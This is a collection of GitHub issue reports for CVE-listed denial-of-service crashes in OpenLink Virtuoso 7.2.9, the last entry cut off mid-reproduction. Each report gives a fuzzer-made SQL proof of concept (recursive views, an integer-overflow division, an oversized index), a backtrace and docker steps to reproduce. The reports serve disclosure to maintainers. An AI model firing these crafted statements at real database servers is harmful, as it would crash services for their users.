An issue in the psiginfo component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.

The PoC is generated by my DBMS fuzzer.

CREATE TABLE t1 (
    x LONG VARCHAR,
    a INTEGER DEFAULT 0,
    b LONG VARCHAR,
    t2 LONG VARCHAR
);
CREATE VIEW t1 AS SELECT \* FROM t1;
INSERT INTO t1(t2, x, x) VALUES('one-toasted,one-null', '', repeat('1234567890',50000));

backtrace:

#0 0x7f421a573900 (psiginfo+0x134a0)
#1 0x7f421a588f9a (vscanf+0x14a)
#2 0x7f421a55edf6 (\_\_snprintf+0x96)
#3 0x5a2227 (sch\_full\_proc\_name\_1+0x2c7)
#4 0x7879a3 (sinv\_find\_func\_map+0x143)
#5 0x788fb7 (sinv\_check\_exp+0x317)
#6 0x78a03d (sinv\_sqlo\_check\_col\_val+0xad)
#7 0x816d50 (sqlc\_insert\_view+0x330)
#8 0x81721d (sqlc\_insert\_view+0x7fd)
#9 0x81721d (sqlc\_insert\_view+0x7fd)
#10 0x81721d (sqlc\_insert\_view+0x7fd)
#11 0x81721d (sqlc\_insert\_view+0x7fd)
#12 0x81721d (sqlc\_insert\_view+0x7fd)
#13 0x81721d (sqlc\_insert\_view+0x7fd)
...
#5714 0x81721d (sqlc\_insert\_view+0x7fd)
#5715 0x81721d (sqlc\_insert\_view+0x7fd)
#5716 0x81721d (sqlc\_insert\_view+0x7fd)
#5717 0x6b7387 (sql\_stmt\_comp+0x987)
#5718 0x6ba122 (sql\_compile\_1+0x1a62)
#5719 0x7c8cd0 (stmt\_set\_query+0x340)
#5720 0x7cabc2 (sf\_sql\_execute+0x922)
#5721 0x7cbf4e (sf\_sql\_execute\_w+0x17e)
#5722 0x7d4c0d (sf\_sql\_execute\_wrapper+0x3d)
#5723 0xe1f01c (future\_wrapper+0x3fc)
#5724 0xe2691e (\_thread\_boot+0x11e)
#5725 0x7f421a84c609 (start\_thread+0xd9)
#5726 0x7f421a61c133 (clone+0x43)

ways to reproduce (write poc to the file '/tmp/test.sql' first):

# remove the old one
docker container rm virtdb\_test -f
# start virtuoso through docker
docker run --name virtdb\_test -itd --env DBA\_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.9
# wait the server starting
sleep 10
# check whether the simple query works
echo "SELECT 1;" | docker exec -i virtdb\_test isql 1111 dba
# run the poc
docker exec -i virtdb\_test isql 1111 dba < "/tmp/test.sql"

CVE-2023-31625: virtuoso 7.2.9 crashed at psiginfo (maybe the same as #1118) · Issue #1132 · openlink/virtuoso-opensource

An issue in the mp_box_deserialize_string function in openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) after running a SELECT statement.

**Description**

When running the following statement on an empty virtuoso-opensource database, the database just crashed:

SELECT table\_name as name, 'TABLE' as type, '' as parentname FROM information\_schema.tables
UNION 
SELECT column\_name as name, data\_type as type, table\_name as parentname FROM information\_schema.columns

**The Way to Reproduce**

Just running the following command to reproduce the crash:

docker run --name virtdb -itd --env DBA\_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.9 # start virtuoso through docker
sleep 10 # wait the server starting
echo "SELECT 1;" | docker exec -i virtdb isql 1111 dba # check whether the simple query works
# The command to crash virtuoso 
echo "SELECT table\_name as name, 'TABLE' as type, '' as parentname FROM information\_schema.tables UNION SELECT column\_name as name, data\_type as type, table\_name as parentname FROM information\_schema.columns;" | docker exec -i virtdb isql 1111 dba

the output in shell:

    OpenLink Virtuoso Interactive SQL (Virtuoso)
    Version 07.20.3236 as of Feb 27 2023
    Type HELP; for help and EXIT; to exit.
    Connected to OpenLink Virtuoso
    Driver: 07.20.3236 OpenLink Virtuoso ODBC Driver
    SQL> 
    *** Error 08S01: [Virtuoso Driver]CL065: Lost connection to server
    at line 1 of Top-Level:
    SELECT table_name as name, 'TABLE' as type, '' as parentname FROM information_schema.tables UNION SELECT column_name as name, data_type as type, table_name as parentname FROM information_schema.columns
    

You can see the error "Lost connection to server", and the container is stopped due to the abnormal exit of the virtuoso instance.

**Backtrace**

The backtrace when crash is as follow. I compiled virtuoso-opensource 7.2.9 with debug mode to get it.

    Thread 8 "virtuoso-t" received signal SIGSEGV, Segmentation fault.
    [Switching to Thread 0x7fffdfdb4700 (LWP 1440941)]
    0x00000000005533b6 in mp_box_deserialize_string (mp=0x7fffc806bfc0, 
        text=0xe34ce1f37a6c3a64 <error: Cannot access memory at address 0xe34ce1f37a6c3a64>, opt_len=2147483647, offset=0) at regist.c:292
    292       switch ((dtp_t)text[0])
    (gdb) bt
    #0  0x00000000005533b6 in mp_box_deserialize_string (mp=0x7fffc806bfc0, 
        text=0xe34ce1f37a6c3a64 <error: Cannot access memory at address 0xe34ce1f37a6c3a64>, opt_len=2147483647, offset=0) at regist.c:292
    #1  0x0000000000427b34 in cha_box_col (cha=0x7fffec416108, ha=0x7fffc8025bf0, row=0x7fffec424720 "k9\241\220(\230\310\r", inx=3)
        at chash.c:2320
    #2  0x00000000004253f1 in chash_to_memcache (inst=0x7fffc802b2f8, tree=0x7fffc802a158, ha=0x7fffc8025bf0) at chash.c:2364
    #3  0x00000000004278e4 in setp_chash_distinct (setp=0x7fffc8025970, inst=0x7fffc802b2f8) at chash.c:2292
    #4  0x0000000000593df7 in setp_node_run (setp=0x7fffc8025970, inst=0x7fffc802b2f8, state=0x7fffc802b2f8, print_blobs=0) at sort.c:385
    #5  0x00000000005948c7 in setp_node_input (setp=0x7fffc8025970, inst=0x7fffc802b2f8, state=0x7fffc802b2f8) at sort.c:606
    #6  0x00000000006bb4e3 in qn_input (xx=0x7fffc8025970, inst=0x7fffc802b2f8, state=0x7fffc802b2f8) at sqlrun.c:982
    #7  0x00000000006bb74a in qn_send_output (src=0x7fffc8024ae0, state=0x7fffc802b2f8) at sqlrun.c:1028
    #8  0x000000000042b6f8 in hash_source_chash_input (hs=0x7fffc8024ae0, inst=0x7fffc802b2f8, state=0x7fffc802b2f8) at chash.c:3233
    #9  0x00000000004d268c in hash_source_input (hs=0x7fffc8024ae0, qst=0x7fffc802b2f8, qst_cont=0x7fffc802b2f8) at hash.c:2613
    #10 0x00000000006bb4e3 in qn_input (xx=0x7fffc8024ae0, inst=0x7fffc802b2f8, state=0x7fffc802b2f8) at sqlrun.c:982
    #11 0x00000000006bb8e6 in qn_ts_send_output (src=0x7fffc8024400, state=0x7fffc802b2f8, after_join_test=0x0) at sqlrun.c:1059
    #12 0x00000000006bf39f in table_source_input (ts=0x7fffc8024400, inst=0x7fffc802b2f8, state=0x7fffc802b2f8) at sqlrun.c:1991
    #13 0x00000000006bb4e3 in qn_input (xx=0x7fffc8024400, inst=0x7fffc802b2f8, state=0x7fffc802b2f8) at sqlrun.c:982
    #14 0x00000000006bb8e6 in qn_ts_send_output (src=0x7fffc80235b0, state=0x7fffc802b2f8, after_join_test=0x0) at sqlrun.c:1059
    #15 0x00000000006bf39f in table_source_input (ts=0x7fffc80235b0, inst=0x7fffc802b2f8, state=0x7fffc802b2f8) at sqlrun.c:1991
    #16 0x00000000006bb4e3 in qn_input (xx=0x7fffc80235b0, inst=0x7fffc802b2f8, state=0x7fffc802b2f8) at sqlrun.c:982
    #17 0x0000000000594e55 in union_node_input (un=0x7fffc800f5d0, inst=0x7fffc802b2f8, state=0x7fffc802b2f8) at sort.c:672
    #18 0x000000000066c60f in qr_resume_pending_nodes (subq=0x7fffc8020680, inst=0x7fffc802b2f8) at sqlintrp.c:1185
    #19 0x000000000066c923 in subq_next (subq=0x7fffc8020680, inst=0x7fffc802b2f8, cr_state=2) at sqlintrp.c:1243
    #20 0x000000000070e52c in subq_node_vec_input (sqs=0x7fffc801dbc0, inst=0x7fffc802b2f8, state=0x0) at sqlvnode.c:702
    #21 0x0000000000594a8b in subq_node_input (sqs=0x7fffc801dbc0, inst=0x7fffc802b2f8, state=0x7fffc802b2f8) at sort.c:691
    #22 0x00000000006bb4e3 in qn_input (xx=0x7fffc801dbc0, inst=0x7fffc802b2f8, state=0x7fffc802b2f8) at sqlrun.c:982
    #23 0x00000000006bb74a in qn_send_output (src=0x7fffc80202b0, state=0x7fffc802b2f8) at sqlrun.c:1028
    #24 0x0000000000439b1a in chash_fill_input (fref=0x7fffc80202b0, inst=0x7fffc802b2f8, state=0x7fffc802b2f8) at chash.c:6013
    #25 0x00000000004d3c05 in hash_fill_node_input (fref=0x7fffc80202b0, inst=0x7fffc802b2f8, qst=0x7fffc802b2f8) at hash.c:3253
    #26 0x00000000006bb4e3 in qn_input (xx=0x7fffc80202b0, inst=0x7fffc802b2f8, state=0x7fffc802b2f8) at sqlrun.c:982
    #27 0x00000000006bb74a in qn_send_output (src=0x7fffc8027e30, state=0x7fffc802b2f8) at sqlrun.c:1028
    #28 0x000000000070e189 in set_ctr_vec_input (sctr=0x7fffc8027e30, inst=0x7fffc802b2f8, state=0x7fffc802b2f8) at sqlvnode.c:632
    #29 0x0000000000596fb4 in set_ctr_input (sctr=0x7fffc8027e30, inst=0x7fffc802b2f8, state=0x7fffc802b2f8) at sort.c:1319
    #30 0x00000000006bb4e3 in qn_input (xx=0x7fffc8027e30, inst=0x7fffc802b2f8, state=0x7fffc802b2f8) at sqlrun.c:982
    #31 0x00000000006c791e in qr_exec (cli=0x7fffc8000e30, qr=0x7fffc801a380, caller=0x2, cr_name=0x7fffc802bdf8 "s1111_1_0", stmt=0x7fffc8018b30, 
        lc_ret=0x0, parms=0x7fffd4021de8, opts=0x7fffd4021f08, named_params=0) at sqlrun.c:4344
    #32 0x00000000006d1f5b in sf_sql_execute (stmt_id=0x7fffd4021e08 "s1111_1_0", text=0x72e2658 "\320\b", cursor_name=0x7fffd4021ec8 "s1111_1_0", 
        params=0x7fffd4021ea8, current_ofs=0x7fffd4021dc8, options=0x7fffd4021f08) at sqlsrv.c:2006
    #33 0x00000000006d26fe in sf_sql_execute_w (stmt_id=0x7fffd4021e08 "s1111_1_0", text=0x72e2658 "\320\b", 
        cursor_name=0x7fffd4021ec8 "s1111_1_0", params=0x7fffd4021ea8, current_ofs=0x7fffd4021dc8, options=0x7fffd4021f08) at sqlsrv.c:2049
    #34 0x00000000006d9620 in sf_sql_execute_wrapper (args=0x7fffdfdb3e30) at sqlsrv.c:3995
    #35 0x0000000000b777f6 in future_wrapper (ignore=0x0) at Dkernel.c:1171
    #36 0x0000000000b7da94 in _thread_boot (arg=0x7fffd4011370) at sched_pthread.c:296
    #37 0x00007ffff7c3a609 in start_thread (arg=<optimized out>) at pthread_create.c:477
    --Type <RET> for more, q to quit, c to continue without paging--
    #38 0x00007ffff7a0a133 in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:95

CVE-2023-31614: virtuoso *crashed* after running a SELECT statement · Issue #1117 · openlink/virtuoso-opensource

An issue in the mp_box_copy component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.

The PoC is generated by my DBMS fuzzer.

CREATE TABLE t1(
    x INTEGER PRIMARY KEY,
    k VARCHAR
  );
CREATE VIEW t1 AS SELECT k, k FROM t1;
UPDATE t1 SET k \= k\-1 WHERE k \> 100 AND x \= 128;

backtrace:

#0 0xe086e9 (mp\_box\_copy+0x9)
#1 0xe08dd0 (mp\_box\_copy\_tree+0xc0)
#2 0x815b3a (sqlc\_col\_to\_view\_scope+0x4fa)
#3 0x815ee2 (sqlc\_exp\_to\_view\_scope+0x162)
#4 0x815ee2 (sqlc\_exp\_to\_view\_scope+0x162)
#5 0x815ee2 (sqlc\_exp\_to\_view\_scope+0x162)
#6 0x815ee2 (sqlc\_exp\_to\_view\_scope+0x162)
#7 0x815ee2 (sqlc\_exp\_to\_view\_scope+0x162)
#8 0x815ee2 (sqlc\_exp\_to\_view\_scope+0x162)
#9 0x815ee2 (sqlc\_exp\_to\_view\_scope+0x162)
#10 0x815ee2 (sqlc\_exp\_to\_view\_scope+0x162)
#11 0x815ee2 (sqlc\_exp\_to\_view\_scope+0x162)
#12 0x815ee2 (sqlc\_exp\_to\_view\_scope+0x162)
...
#1045 0x815ee2 (sqlc\_exp\_to\_view\_scope+0x162)
#1046 0x815ee2 (sqlc\_exp\_to\_view\_scope+0x162)
#1047 0x815ee2 (sqlc\_exp\_to\_view\_scope+0x162)
#1048 0x817c90 (sqlc\_update\_view+0xa60)
#1049 0x7ddad0 (sqlc\_update\_searched+0xbd0)
#1050 0x817cd1 (sqlc\_update\_view+0xaa1)
#1051 0x7ddad0 (sqlc\_update\_searched+0xbd0)
#1052 0x817cd1 (sqlc\_update\_view+0xaa1)
#1053 0x7ddad0 (sqlc\_update\_searched+0xbd0)
#1054 0x817cd1 (sqlc\_update\_view+0xaa1)
#1055 0x7ddad0 (sqlc\_update\_searched+0xbd0)
#1056 0x817cd1 (sqlc\_update\_view+0xaa1)
...
#3132 0x817cd1 (sqlc\_update\_view+0xaa1)
#3133 0x7ddad0 (sqlc\_update\_searched+0xbd0)
#3134 0x817cd1 (sqlc\_update\_view+0xaa1)
#3135 0x7ddad0 (sqlc\_update\_searched+0xbd0)
#3136 0x6b7212 (sql\_stmt\_comp+0x812)
#3137 0x6ba122 (sql\_compile\_1+0x1a62)
#3138 0x7c8cd0 (stmt\_set\_query+0x340)
#3139 0x7cabc2 (sf\_sql\_execute+0x922)
#3140 0x7cbf4e (sf\_sql\_execute\_w+0x17e)
#3141 0x7d4c0d (sf\_sql\_execute\_wrapper+0x3d)
#3142 0xe1f01c (future\_wrapper+0x3fc)
#3143 0xe2691e (\_thread\_boot+0x11e)
#3144 0x7f2025e0d609 (start\_thread+0xd9)
#3145 0x7f2025bdd133 (clone+0x43)

ways to reproduce (write poc to the file '/tmp/test.sql' first):

# remove the old one
docker container rm virtdb\_test -f
# start virtuoso through docker
docker run --name virtdb\_test -itd --env DBA\_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.9
# wait the server starting
sleep 10
# check whether the simple query works
echo "SELECT 1;" | docker exec -i virtdb\_test isql 1111 dba
# run the poc
docker exec -i virtdb\_test isql 1111 dba < "/tmp/test.sql"

CVE-2023-31623: virtuoso 7.2.9 crashed at mp_box_copy · Issue #1131 · openlink/virtuoso-opensource

An issue in the stricmp component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.

The PoC is generated by my DBMS fuzzer.

CREATE TABLE t1 (
  x VARCHAR,
  k VARCHAR
);
CREATE VIEW t1 AS SELECT x, k FROM t1;
INSERT INTO t1 VALUES ('x', 'y');

backtrace:

#0 0xeff7b6 (stricmp+0x6)
#1 0x607569 (strihashcmp+0x29)
#2 0xdec7af (id\_hash\_get+0x5f)
#3 0x607e58 (sch\_name\_to\_object\_sc+0x58)
#4 0x6081b5 (sch\_name\_to\_object+0xf5)
#5 0x7d8f70 (sqlc\_insert+0x50)
#6 0x81721d (sqlc\_insert\_view+0x7fd)
#7 0x81721d (sqlc\_insert\_view+0x7fd)
#8 0x81721d (sqlc\_insert\_view+0x7fd)
#9 0x81721d (sqlc\_insert\_view+0x7fd)
#10 0x81721d (sqlc\_insert\_view+0x7fd)
...
#5737 0x81721d (sqlc\_insert\_view+0x7fd)
#5738 0x81721d (sqlc\_insert\_view+0x7fd)
#5739 0x6b7387 (sql\_stmt\_comp+0x987)
#5740 0x6ba122 (sql\_compile\_1+0x1a62)
#5741 0x7c8cd0 (stmt\_set\_query+0x340)
#5742 0x7cabc2 (sf\_sql\_execute+0x922)
#5743 0x7cbf4e (sf\_sql\_execute\_w+0x17e)
#5744 0x7d4c0d (sf\_sql\_execute\_wrapper+0x3d)
#5745 0xe1f01c (future\_wrapper+0x3fc)
#5746 0xe2691e (\_thread\_boot+0x11e)
#5747 0x7fa64e4f4609 (start\_thread+0xd9)
#5748 0x7fa64e2c4133 (clone+0x43)

ways to reproduce (write poc to the file '/tmp/test.sql' first):

# remove the old one
docker container rm virtdb\_test -f
# start virtuoso through docker
docker run --name virtdb\_test -itd --env DBA\_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.9
# wait the server starting
sleep 10
# check whether the simple query works
echo "SELECT 1;" | docker exec -i virtdb\_test isql 1111 dba
# run the poc
docker exec -i virtdb\_test isql 1111 dba < "/tmp/test.sql"

CVE-2023-31628: virtuoso 7.2.9 crashed at stricmp (maybe the same as #1118) · Issue #1141 · openlink/virtuoso-opensource

An issue in the chash_array component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.

The PoC is generated by my DBMS fuzzer.

CREATE TABLE t1(x INTEGER UNIQUE);
CREATE TABLE k(v varchar(255), excluded varchar(255));
INSERT INTO t1(x, x, x, x, x, x, x) VALUES(16183,15638,6,0,5,2,0);
SELECT 'one', t1.\* FROM t1 LEFT JOIN k ON t1.x\=k.v WHERE k.v IS NULL;

backtrace:

#0 0x4257c4 (chash\_array+0x834)
#1 0x43932f (hash\_source\_chash\_input+0x6df)
#2 0x7ac43e (qn\_input+0x3ce)
#3 0x7ac8a6 (qn\_send\_output+0x236)
#4 0x81e26d (set\_ctr\_vec\_input+0x94d)
#5 0x7ac43e (qn\_input+0x3ce)
#6 0x7acb6f (qn\_ts\_send\_output+0x23f)
#7 0x7b247e (table\_source\_input+0x16ee)
#8 0x7ac43e (qn\_input+0x3ce)
#9 0x7ac8a6 (qn\_send\_output+0x236)
#10 0x44c34e (chash\_fill\_input+0x13e)
#11 0x535d6f (hash\_fill\_node\_input+0xef)
#12 0x7ac43e (qn\_input+0x3ce)
#13 0x7ac8a6 (qn\_send\_output+0x236)
#14 0x81e26d (set\_ctr\_vec\_input+0x94d)
#15 0x7ac43e (qn\_input+0x3ce)
#16 0x7bdc6e (qr\_exec+0x11ee)
#17 0x7cb446 (sf\_sql\_execute+0x11a6)
#18 0x7cbf4e (sf\_sql\_execute\_w+0x17e)
#19 0x7d4c0d (sf\_sql\_execute\_wrapper+0x3d)
#20 0xe1f01c (future\_wrapper+0x3fc)
#21 0xe2691e (\_thread\_boot+0x11e)
#22 0x7fac44860609 (start\_thread+0xd9)
#23 0x7fac44630133 (clone+0x43)

ways to reproduce (write poc to the file '/tmp/test.sql' first):

# remove the old one
docker container rm virtdb\_test -f
# start virtuoso through docker
docker run --name virtdb\_test -itd --env DBA\_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.9
# wait the server starting
sleep 10
# check whether the simple query works
echo "SELECT 1;" | docker exec -i virtdb\_test isql 1111 dba
# run the poc
docker exec -i virtdb\_test isql 1111 dba < "/tmp/test.sql"

CVE-2023-31615: virtuoso 7.2.9 crashed at chash_array · Issue #1124 · openlink/virtuoso-opensource

An issue in the artm_div_int component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

fuboat opened this issue

Apr 12, 2023

· 0 comments

Closed

**virtuoso 7.2.9 crashed at artm\_div\_int #1123**

fuboat opened this issue

Apr 12, 2023

· 0 comments

**Comments**

The PoC is generated by my DBMS fuzzer.

SELECT CAST('\-9223372036854775808' AS INTEGER) / CAST('\-1' AS SMALLINT);

backtrace:

#0 0xc227a4 (artm\_div\_int+0xf4)
#1 0xc23766 (artm\_vec+0x7d6)
#2 0x7518c2 (code\_vec\_run\_v+0x10e2)
#3 0x7ac3ff (qn\_input+0x38f)
#4 0x7ac8a6 (qn\_send\_output+0x236)
#5 0x81e26d (set\_ctr\_vec\_input+0x94d)
#6 0x7ac43e (qn\_input+0x3ce)
#7 0x7bdc6e (qr\_exec+0x11ee)
#8 0x7cb446 (sf\_sql\_execute+0x11a6)
#9 0x7cbf4e (sf\_sql\_execute\_w+0x17e)
#10 0x7d4c0d (sf\_sql\_execute\_wrapper+0x3d)
#11 0xe1f01c (future\_wrapper+0x3fc)
#12 0xe2691e (\_thread\_boot+0x11e)
#13 0x7eff81a0c609 (start\_thread+0xd9)
#14 0x7eff817dc133 (clone+0x43)

ways to reproduce (write poc to the file '/tmp/test.sql' first):

# remove the old one
docker container rm virtdb\_test -f
# start virtuoso through docker
docker run --name virtdb\_test -itd --env DBA\_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.9
# wait the server starting
sleep 10
# check whether the simple query works
echo "SELECT 1;" | docker exec -i virtdb\_test isql 1111 dba
# run the poc
docker exec -i virtdb\_test isql 1111 dba < "/tmp/test.sql"

1 participant

CVE-2023-31608: virtuoso 7.2.9 crashed at artm_div_int · Issue #1123 · openlink/virtuoso-opensource

An issue in the sch_name_to_object component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.

The PoC is generated by my DBMS fuzzer.

CREATE TABLE t1(x VARCHAR, k VARCHAR, v VARCHAR);
CREATE VIEW t1 AS SELECT x, x FROM t1;
UPDATE t1 SET x \= x + 100;

backtrace:

#0 0x6080d1 (sch\_name\_to\_object+0x11)
#1 0x7dcf6f (sqlc\_update\_searched+0x6f)
#2 0x817cd1 (sqlc\_update\_view+0xaa1)
#3 0x7ddad0 (sqlc\_update\_searched+0xbd0)
#4 0x817cd1 (sqlc\_update\_view+0xaa1)
#5 0x7ddad0 (sqlc\_update\_searched+0xbd0)
#6 0x817cd1 (sqlc\_update\_view+0xaa1)
#7 0x7ddad0 (sqlc\_update\_searched+0xbd0)
#8 0x817cd1 (sqlc\_update\_view+0xaa1)
#9 0x7ddad0 (sqlc\_update\_searched+0xbd0)
#10 0x817cd1 (sqlc\_update\_view+0xaa1)
...
#2546 0x817cd1 (sqlc\_update\_view+0xaa1)
#2547 0x7ddad0 (sqlc\_update\_searched+0xbd0)
#2548 0x817cd1 (sqlc\_update\_view+0xaa1)
#2549 0x7ddad0 (sqlc\_update\_searched+0xbd0)
#2550 0x817cd1 (sqlc\_update\_view+0xaa1)
#2551 0x7ddad0 (sqlc\_update\_searched+0xbd0)
#2552 0x6b7212 (sql\_stmt\_comp+0x812)
#2553 0x6ba122 (sql\_compile\_1+0x1a62)
#2554 0x7c8cd0 (stmt\_set\_query+0x340)
#2555 0x7cabc2 (sf\_sql\_execute+0x922)
#2556 0x7cbf4e (sf\_sql\_execute\_w+0x17e)
#2557 0x7d4c0d (sf\_sql\_execute\_wrapper+0x3d)
#2558 0xe1f01c (future\_wrapper+0x3fc)
#2559 0xe2691e (\_thread\_boot+0x11e)
#2560 0x7f5b7a921609 (start\_thread+0xd9)
#2561 0x7f5b7a6f1133 (clone+0x43)

ways to reproduce (write poc to the file '/tmp/test.sql' first):

# remove the old one
docker container rm virtdb\_test -f
# start virtuoso through docker
docker run --name virtdb\_test -itd --env DBA\_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.9
# wait the server starting
sleep 10
# check whether the simple query works
echo "SELECT 1;" | docker exec -i virtdb\_test isql 1111 dba
# run the poc
docker exec -i virtdb\_test isql 1111 dba < "/tmp/test.sql"

CVE-2023-31619: virtuoso 7.2.9 crashed at sch_name_to_object · Issue #1133 · openlink/virtuoso-opensource

An issue in the __libc_malloc component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.

The PoC is generated by my DBMS fuzzer.

CREATE TABLE t1(x VARCHAR, k VARCHAR);
CREATE INDEX t1i1 ON t1(c1,c2,c3,c4,c5,c6,c7,c8,c9,c10,c11,c12,c13,c14,c15,c16,c17,c18,c19,c20,c21,c22,c23,c24,c25,c26,c27,c28,c29,c30,c31,c32,c33,c34,c35,c36,c37,c38,c39,c40,c41,c42,c43,c44,c45,c46,c47,c48,c49,c50,c51,c52,c53,c54,c55,c56,c57,c58,c59,c60,c61,c62,c63,c64,c65,c66,c67,c68,c69,c70,c71,c72,c73,c74,c75,c76,c77,c78,c79,c80,c81,c82,c83,c84,c85,c86,c87,c88,c89,c90,c91,c92,c93,c94,c95,c96,c97,c98,c99,c100,c101,c102,c103,c104,c105,c106,c107,c108,c109,c110,c111,c112,c113,c114,c115,c116,c117,c118,c119,c120,c121,c122,c123,c124,c125,c126,c127,c128,c129,c130,c131,c132,c133,c134,c135,c136,c137,c138,c139,c140,c141,c142,c143,c144,c145,c146,c147,c148,c149,c150,c151,c152,c153,c154,c155,c156,c157,c158,c159,c160,c161,c162,c163,c164,c165,c166,c167,c168,c169,c170,c171,c172,c173,c174,c175,c176,c177,c178,c179,c180,c181,c182,c183,c184,c185,c186,c187,c188,c189,c190,c191,c192,c193,c194,c195,c196,c197,c198,c199,c200,c201,c202,c203,c204,c205,c206,c207,c208,c209,c210,c211,c212,c213,c214,c215,c216,c217,c218,c219,c220,c221,c222,c223,c224,c225,c226,c227,c228,c229,c230,c231,c232,c233,c234,c235,c236,c237,c238,c239,c240,c241,c242,c243,c244,c245,c246,c247,c248,c249,c250,c251,c252,c253,c254,c255,c256,c257,c258,c259,c260,c261,c262,c263,c264,c265,c266,c267,c268,c269,c270,c271,c272,c273,c274,c275,c276,c277,c278,c279,c280,c281,c282,c283,c284,c285,c286,c287,c288,c289,c290,c291,c292,c293,c294,c295,c296,c297,c298,c299,c300,c301,c302,c303,c304,c305,c306,c307,c308,c309,c310,c311,c312,c313,c314,c315,c316,c317,c318,c319,c320,c321,c322,c323,c324,c325,c326,c327,c328,c329,c330,c331,c332,c333,c334,c335,c336,c337,c338,c339,c340,c341,c342,c343,c344,c345,c346,c347,c348,c349,c350,c351,c352,c353,c354,c355,c356,c357,c358,c359,c360,c361,c362,c363,c364,c365,c366,c367,c368,c369,c370,c371,c372,c373,c374,c375,c376,c377,c378,c379,c380,c381,c382,c383,c384,c385,c386,c387,c388,c389,c390,c391,c392,c393,c394,c395,c396,c397,c398,c399,c400,c401,c402,c403,c404,c405,c406,c407,c408,c409,c410,c411,c412,c413,c414,c415,c416,c417,c418,c419,c420,c421,c422,c423,c424,c425,c426,c427,c428,c429,c430,c431,c432,c433,c434,c435,c436,c437,c438,c439,c440,c441,c442,c443,c444,c445,c446,c447,c448,c449,c450,c451,c452,c453,c454,c455,c456,c457,c458,c459,c460,c461,c462,c463,c464,c465,c466,c467,c468,c469,c470,c471,c472,c473,c474,c475,c476,c477,c478,c479,c480,c481,c482,c483,c484,c485,c486,c487,c488,c489,c490,c491,c492,c493,c494,c495,c496,c497,c498,c499,c500,c501,c502,c503,c504,c505,c506,c507,c508,c509,c510,c511,c512,c513,c514,c515,c516,c517,c518,c519,c520,c521,c522,c523,c524,c525,c526,c527,c528,c529,c530,c531,c532,c533,c534,c535,c536,c537,c538,c539,c540,c541,c542,c543,c544,c545,c546,c547,c548,c549,c550,c551,c552,c553,c554,c555,c556,c557,c558,c559,c560,c561,c562,c563,c564,c565,c566,c567,c568,c569,c570,c571,c572,c573,c574,c575,c576,c577,c578,c579,c580,c581,c582,c583,c584,c585,c586,c587,c588,c589,c590,c591,c592,c593,c594,c595,c596,c597,c598,c599,c600,c601,c602,c603,c604,c605,c606,c607,c608,c609,c610,c611,c612,c613,c614,c615,c616,c617,c618,c619,c620,c621,c622,c623,c624,c625,c626,c627,c628,c629,c630,c631,c632,c633,c634,c635,c636,c637,c638,c639,c640,c641,c642,c643,c644,c645,c646,c647,c648,c649,c650,c651,c652,c653,c654,c655,c656,c657,c658,c659,c660,c661,c662,c663,c664,c665,c666,c667,c668,c669,c670,c671,c672,c673,c674,c675,c676,c677,c678,c679,c680,c681,c682,c683,c684,c685,c686,c687,c688,c689,c690,c691,c692,c693,c694,c695,c696,c697,c698,c699,c700,c701,c702,c703,c704,c705,c706,c707,c708,c709,c710,c711,c712,c713,c714,c715,c716,c717,c718,c719,c720,c721,c722,c723,c724,c725,c726,c727,c728,c729,c730,c731,c732,c733,c734,c735,c736,c737,c738,c739,c740,c741,c742,c743,c744,c745,c746,c747,c748,c749,c750,c751,c752,c753,c754,c755,c756,c757,c758,c759,c760,c761,c762,c763,c764,c765,c766,c767,c768,c769,c770,c771,c772,c773,c774,c775,c776,c777,c778,c779,c780,c781,c782,c783,c784,c785,c786,c787,c788,c789,c790,c791,c792,c793,c794,c795,c796,c797,c798,c799,c800,c801,c802,c803,c804,c805,c806,c807,c808,c809,c810,c811,c812,c813,c814,c815,c816,c817,c818,c819,c820,c821,c822,c823,c824,c825,c826,c827,c828,c829,c830,c831,c832,c833,c834,c835,c836,c837,c838,c839,c840,c841,c842,c843,c844,c845,c846,c847,c848,c849,c850,c851,c852,c853,c854,c855,c856,c857,c858,c859,c860,c861,c862,c863,c864,c865,c866,c867,c868,c869,c870,c871,c872,c873,c874,c875,c876,c877,c878,c879,c880,c881,c882,c883,c884,c885,c886,c887,c888,c889,c890,c891,c892,c893,c894,c895,c896,c897,c898,c899,c900,c901,c902,c903,c904,c905,c906,c907,c908,c909,c910,c911,c912,c913,c914,c915,c916,c917,c918,c919,c920,c921,c922,c923,c924,c925,c926,c927,c928,c929,c930,c931,c932,c933,c934,c935,c936,c937,c938,c939,c940,c941,c942,c943,c944,c945,c946,c947,c948,c949,c950,c951,c952,c953,c954,c955,c956,c957,c958,c959,c960,c961,c962,c963,c964,c965,c966,c967,c968,c969,c970,c971,c972,c973,c974,c975,c976,c977,c978,c979,c980,c981,c982,c983,c984,c985,c986,c987,c988,c989,c990,c991,c992,c993,c994,c995,c996,c997,c998,c999,c1000);

backtrace:

#0 0x7f073bac91fe (\_\_libc\_malloc+0x11e)
#1 0xe1e59b (dk\_alloc\_reserve\_malloc+0x2b)
#2 0xde1ce0 (dk\_alloc+0x30)
#3 0xde4cc7 (dk\_alloc\_box+0x197)
#4 0x7c345b (qr\_rec\_exec+0xab)
#5 0x4d7c8d (ddl\_create\_key+0xad)
#6 0x7f07040db688 -- no symbol name found

ways to reproduce (write poc to the file '/tmp/test.sql' first):

# remove the old one
